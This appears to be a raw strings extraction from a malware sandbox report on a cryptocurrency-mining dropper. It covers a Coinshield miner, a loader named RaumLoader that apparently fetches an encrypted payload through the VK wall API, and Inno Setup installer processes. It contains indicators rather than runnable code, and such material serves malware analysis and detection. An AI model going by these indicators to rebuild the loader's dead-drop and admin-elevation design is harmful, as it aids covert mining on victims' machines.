[MASTER] Share Found | Difficulty %f | Hash %s | Thread %.2i --> [Rejected]
[MASTER] Block Found | Difficulty %f | Hash %s | Thread %.2i --> [Accepted]
[MASTER] Share Found | Difficulty %f | Hash %s | Thread %.2i --> [Stale Share]
[MASTER] Coinshield Network: New Block %u.
[MASTER] Received Obsolete Block %u... Requesting New Block.
[MASTER] Block %s Height = %u Received on Thread %u
%s: __pos (which is %zu) > this->size() (which is %zu)
./boost/exception/detail/exception_ptr.hpp
boost thread: trying joining itself
Big Number part of OpenSSL 1.0.1h 5 Jun 2014
error:lX:%s:%s:%s
passed a null parameter
x509 certificate routines
DSO support routines
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
%s(%d): OpenSSL internal error, assertion failed: %s
x509_pkey
evp_pkey
ssl_cert
ssl_sess_cert
lhash part of OpenSSL 1.0.1h 5 Jun 2014
[d:d:d]
%5lu file=%s, line=%d,
number=%d, address=lX
thread=%lu, file=%s, line=%d, info="
%ld bytes leaked in %d chunks
Stack part of OpenSSL 1.0.1h 5 Jun 2014
dhKeyAgreement
challengePassword
extendedCertificateAttributes
nsCertExt
Netscape Certificate Extension
nsCertType
Netscape Cert Type
nsBaseUrl
Netscape Base Url
nsRevocationUrl
Netscape Revocation Url
nsCaRevocationUrl
Netscape CA Revocation Url
nsRenewalUrl
Netscape Renewal Url
nsCaPolicyUrl
Netscape CA Policy Url
nsCertSequence
Netscape Certificate Sequence
subjectKeyIdentifier
X509v3 Subject Key Identifier
keyUsage
X509v3 Key Usage
privateKeyUsagePeriod
X509v3 Private Key Usage Period
certificatePolicies
X509v3 Certificate Policies
authorityKeyIdentifier
X509v3 Authority Key Identifier
extendedKeyUsage
X509v3 Extended Key Usage
TLS Web Server Authentication
TLS Web Client Authentication
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
keyBag
pkcs8ShroudedKeyBag
certBag
localKeyID
x509Certificate
sdsiCertificate
id-smime-mod-msg-v3
id-smime-ct-publishCert
id-smime-aa-msgSigDigest
id-smime-aa-encrypKeyPref
id-smime-aa-signingCertificate
id-smime-aa-smimeEncryptCerts
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-certValues
id-smime-aa-ets-certCRLTimestamp
id-mod-qualified-cert-88
id-mod-qualified-cert-93
id-mod-attribute-cert
id-it-caProtEncCert
id-it-signKeyPairTypes
id-it-encKeyPairTypes
id-it-caKeyUpdateInfo
id-it-unsupportedOIDs
id-it-keyPairParamReq
id-it-keyPairParamRep
id-it-revPassphrase
id-regCtrl-oldCertID
id-regCtrl-protocolEncrKey
id-regInfo-certReq
id-cmc-getCert
id-cmc-confirmCertAcceptance
id-ecPublicKey
set-msgExt
set-certExt
certificate extensions
setct-AcqCardCodeMsg
setct-PCertReqData
setct-PCertResTBS
setct-CertReqData
setct-CertReqTBS
setct-CertResData
setct-CertInqReqTBS
setct-AcqCardCodeMsgTBE
setct-CertReqTBE
setct-CertReqTBEX
setct-CertResTBE
setCext-certType
setCext-cCertRequired
setAttr-Cert
set-rootKeyThumb
JOINT-ISO-ITU-T
joint-iso-itu-t
msSmartcardLogin
Microsoft Smartcardlogin
proxyCertInfo
Proxy Certificate Information
certicom-arc
certificateIssuer
X509v3 Certificate Issuer
id-PasswordBasedMAC
password based MAC
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-None-KeyMeshing
LocalKeySet
Microsoft Local Key set
supportedApplicationContext
userPassword
userCertificate
cACertificate
certificateRevocationList
crossCertificatePair
supportedAlgorithms
anyExtendedKeyUsage
Any Extended Key Usage
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
RAND part of OpenSSL 1.0.1h 5 Jun 2014
bn(%d,%d)
ASN.1 part of OpenSSL 1.0.1h 5 Jun 2014
ADVAPI32.DLL
KERNEL32.DLL
NETAPI32.DLL
USER32.DLL
SHA1 part of OpenSSL 1.0.1h 5 Jun 2014
SHA-256 part of OpenSSL 1.0.1h 5 Jun 2014
SHA-512 part of OpenSSL 1.0.1h 5 Jun 2014
rsa_keygen_bits
rsa_keygen_pubexp
hexkey
Public Key
%s algorithm "%s" unsupported
Private Key
Public-Key: (%d bit)
Private-Key: (%d bit)
PKCS#3 DH Private-Key
%s: (%d bit)
private-key:
public-key:
recommended-private-length: %d bits
PKCS#3 DH Public-Key
Private-Key
Public-Key
RSA part of OpenSSL 1.0.1h 5 Jun 2014
Diffie-Hellman part of OpenSSL 1.0.1h 5 Jun 2014
dh_key.c
pub_key
priv_key
DSA part of OpenSSL 1.0.1h 5 Jun 2014
ec_key.c
ECDSA part of OpenSSL 1.0.1h 5 Jun 2014
j <= (int)sizeof(ctx->key)
len>=0 && len<=(int)sizeof(ctx->key)
%d.%d.%d.%d
value.set
value.single
x_pubkey.c
X509_PUBKEY
public_key
Public key OCSP hash:
x%s
%s - d:d:d%.*s %d%s
%s - d:d:d %d%s
Certificate:
%8sVersion: %lu (0x%lx)
%s%lu (%s0x%lx)
s%s
x%c
Issuer:%c
Subject:%c
Subject Public Key Info:
sPublic Key Algorithm:
sUnable to load Public Key
PKCS8_PRIV_KEY_INFO
pkeyalg
pkey
%s %s%lu (%s0x%lx)
EC_PRIVATEKEY
privateKey
publicKey
value.named_curve
value.parameters
value.implicitlyCA
p.prime
p.char_two
p.other
p.onBasis
p.tpBasis
p.ppBasis
ASN1 OID: %s
Field Type: %s
Basis Type: %s
CMS_PasswordRecipientInfo
CMS_KeyAgreeRecipientInfo
CMS_OriginatorIdentifierOrKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
CMS_KeyTransRecipientInfo
CMS_CertificateChoices
CMS_OtherCertificateFormat
d.allOrFirstTier
d.receiptList
d.data
d.signedData
d.envelopedData
d.digestedData
d.encryptedData
d.authenticatedData
d.compressedData
d.other
d.ktri
d.kari
d.kekri
d.pwri
d.ori
keyDerivationAlgorithm
keyEncryptionAlgorithm
encryptedKey
keyIdentifier
recipientEncryptedKeys
d.issuerAndSerialNumber
d.subjectKeyIdentifier
d.originatorKey
d.rKeyId
keyAttrId
keyAttr
certificates
d.crl
d.certificate
d.extendedCertificate
d.v1AttrCert
d.v2AttrCert
otherCertFormat
otherCert
AES part of OpenSSL 1.0.1h 5 Jun 2014
ECDH part of OpenSSL 1.0.1h 5 Jun 2014
d.otherName
d.rfc822Name
d.dNSName
d.directoryName
d.ediPartyName
d.uniformResourceIdentifier
d.iPAddress
d.registeredID
openssl.cnf
EVP part of OpenSSL 1.0.1h 5 Jun 2014
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
keylen <= sizeof key
cert
key_enc_algor
enc_key
d.sign
d.enveloped
d.signed_and_enveloped
d.digest
d.encrypted
cert_info
OPENSSL_ALLOW_PROXY_CERTS
X.509 part of OpenSSL 1.0.1h 5 Jun 2014
\X
%*sAlias: %s
%*sKey Id:
%sX
%s:%s
%*s<Not Supported>
%*s%s
%*s%s:
%lu:%s:%s:%d:%s
%*s%s OF %s {
%s (%s)
ERROR: selector [%d] invalid
Unprocessed type %d
:EXTERNAL TYPE %s
PROXY_CERT_INFO_EXTENSION
%*sOnly User Certificates
%*sOnly CA Certificates
%*sOnly Attribute Certificates
name.fullname
name.relativename
Key Compromise
keyCompromise
Cessation Of Operation
cessationOfOperation
Certificate Hold
certificateHold
keylength
keyfunc
<unsupported>
othername:<unsupported>
X400Name:<unsupported>
EdiPartyName:<unsupported>
email:%s
DNS:%s
URI:%s
IP Address:%d.%d.%d.%d
pubkey
Key Encipherment
keyEncipherment
Key Agreement
keyAgreement
Certificate Sign
keyCertSign
v3_skey.c
PKEY_USAGE_PERIOD
%*sCPS: %s
%*sOrganization: %s
%*sNumber%s:
%*sExplicit Text: %s
CERTIFICATEPOLICIES
d.cpsuri
d.usernotice
keyid
v3_akey.c
EXTENDED_KEY_USAGE
%*scrlUrl:
%*sZone: %s, User:
%*sPolicy Text: %s
%d.%d.%d.%d/%d.%d.%d.%d
CONF part of OpenSSL 1.0.1h 5 Jun 2014
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
p12_key.c
X509_CERT_PAIR
X509_CERT_AUX
AUTHORITY_KEYID
ddddddZ
ddddddZ
priv [ %d ]
cont [ %d ]
appl [ %d ]
<ASN1 %d>
'() ,-./:=?
x -
%sx - <SPACES/NULS>
Enter PEM pass phrase:
phrase is too short, needs to be at least %d chars
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
PRIVATE KEY
X509 CERTIFICATE
CERTIFICATE
NEW CERTIFICATE REQUEST
CERTIFICATE REQUEST
TRUSTED CERTIFICATE
PEM part of OpenSSL 1.0.1h 5 Jun 2014
certs-only
MIME-Version: 1.0%s
protocol="%ssignature";
"; boundary="----%s"%s%s
This is an S/MIME signed message%s%s
------%s%s
%s------%s%s
Content-Type: %ssignature;
name="smime.p7s"%s
Content-Transfer-Encoding: base64%s
filename="smime.p7s"%s%s
%s------%s--%s%s
name="%s"%s
Content-Transfer-Encoding: base64%s%s
filename="%s"%s
Content-Type: %smime;
smime-type=%s;
-----BEGIN %s-----
-----END %s-----
evp_pkey.c
MD5 part of OpenSSL 1.0.1h 5 Jun 2014
OCSP_CERTSTATUS
OCSP_CERTID
crlUrl
certs
certId
certStatus
value.good
value.revoked
value.unknown
value.byName
value.byKey
reqCert
issuerKeyHash
[%s] %s=%s
[[%s]]
CONF_def part of OpenSSL 1.0.1h 5 Jun 2014
nkey <= EVP_MAX_KEY_LENGTH
evp_key.c
?456789:;<=
!"#$%&'()* ,-./0123
value.keybag
value.shkeybag
value.safes
value.bag
value.other
value.x509cert
value.sdsicert
Verifying - %s
GNU MP assertion failed: %s
%m/%d/%y
%H:%M:%S
not enough space for format expansion (Please submit full bug report at hXXp://gcc.gnu.org/bugs.html):
operator
operator
global constructors keyed to
global destructors keyed to
operator""
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
0123456789
Assertion failed: (%s), file %s, line %d
M%p %d %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
C%p %d %s
C%p %d V=%0X w=%ld %s
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
N5boost4asio21stream_socket_serviceINS0_2ip3tcpEEE
N5boost4asio2ip16resolver_serviceINS1_3tcpEEE
N5boost4asio6detail12service_baseINS0_21stream_socket_serviceINS0_2ip3tcpEEEEE
N5boost4asio6detail12service_baseINS0_2ip16resolver_serviceINS3_3tcpEEEEE
N5boost4asio6detail14typeid_wrapperINS0_21stream_socket_serviceINS0_2ip3tcpEEEEE
N5boost4asio6detail14typeid_wrapperINS0_2ip16resolver_serviceINS3_3tcpEEEEE
N5boost6detail17sp_counted_impl_pINS_4asio19basic_stream_socketINS2_2ip3tcpENS2_21stream_socket_serviceIS5_EEEEEE
N5boost6detail17sp_counted_impl_pISt6vectorINS_4asio2ip20basic_resolver_entryINS4_3tcpEEESaIS7_EEEE
GCC: (i686-posix-dwarf-rev0, Built by MinGW-W64 project) 4.8.3
GCC: (i686-posix-dwarf-rev1, Built by MinGW-W64 project) 4.9.1
GCC: (i686-posix-dwarf-rev2, Built by MinGW-W64 project) 4.9.0
GCC: (i686-posix-sjlj-rev0, Built by MinGW-W64 project) 4.8.3
ReportEventA
CreateIoCompletionPort
GetProcessHeap
_acmdln
_amsg_exit
GetProcessWindowStation
ADVAPI32.dll
GDI32.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
WS2_32.dll
c%m/%d/%y
File: %ws, Line %u
emsvcrt.dll

conhost.exe_1768:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
Bv.SCv
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

%original file name%.exe_3820:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)
Mozilla/4.8 [en] (Windows NT 5.0; U)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1
HTTP/1.0
GetHTTPFile failed with code
Passed args[
/method/wall.get.xml?count=1&owner_id=-
api.vk.com
/method/wall.get.xml
Downloaded. Decrypting with key
hXXp://
Data\Client\Strings_RUS_RU.package
{46F1375C-3A8C-42E1-9A27-0CE809AD35AC}
{48EBEBBF-B9F8-4520-A3CF-89A730721917}
X:\551b45c5a2e3ajn57690b0469d26f1a3
\mic.exe
encryption_key
C:\Users\kali\Documents\Visual Studio 2012\Projects\Mining_framework\Release\RaumLoader.pdb
KERNEL32.dll
USER32.dll
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
RegSetKeyValueA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
GetCPInfo
GetProcessHeap
zcÁ
original_exe_lol
setup.exe
}c:\%original file name%.exe
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian

setup.exe_3980:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
ENoMonitorSupportException
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
EVariantBadIndexError
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
GetWindowsDirectoryW
GetCPInfo
comctl32.dll
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
KWindows
UrlMon
6MsgIDs
Msgs
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Invalid file name - %s
Wed(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation

setup.tmp_3656:

.text
`.itext
`.data
.idata
.rdata
@.rsrc
Windows
ENoMonitorSupportException
.uvCOu
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.OA
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
EInvalidGraphicOperation
TPent%C
PasswordChar
OnKeyDown
OnKeyPressLkR
OnKeyUp
ssHorizontal
TCustomButton.TButtonStyle
msShiftSelect
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKeyh
THotKey
HotKey
InvalidKeys
vsReport
Uh3%F
TComboBoxExEnumerator
EXPORT
TPSExec
TPSRuntimeClassImporterP;U
TPSExportedVar
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
AUTOHOTKEYS
RETHINKHOTKEYS
OnKeyPress
t.Htb
1.2.1
TPasswordEdit
TPasswordEditHWL
PasswordEdit*
Password
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel
GetPassword
CheckPassword
<requestedExecutionLevel level="
IMsg
FormKeyDown
PasswordCheckHash
TKeyNameConst
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
procedure SetPassword(const Password: String);
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Uh.QP
IMsgt
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
MSGBOXEX
SETPASSWORD
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
TKeyEvent
TKeyPressEvent
HelpKeyword
AutoHotkeys
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
1Hw2.Hwa
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
ExitWindowsEx
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
msimg32.dll
gdi32.dll
SetViewportOrgEx
version.dll
mpr.dll
TransactNamedPipe
SetNamedPipeHandleState
GetWindowsDirectoryW
GetCPInfo
CreateNamedPipeW
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
ole32.dll
comctl32.dll
winspool.drv
shell32.dll
ShellExecuteExW
ShellExecuteW
comdlg32.dll
%Ch^.~
$9444432
&"""98899964#%#%
%%7<;:91)!
`.rdata
@.data
.pdata
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
KWindows
UrlMon
6MsgIDs
Msgs
pIPEdit
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryA
RegOpenKeyA
RegCreateKeyExA
SHFOLDER.dll
dll\shfolder.dbg
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s[%d]
%s_%d
.Owner
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
USER32.DLL
uxtheme.dll
DWMAPI.DLL
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
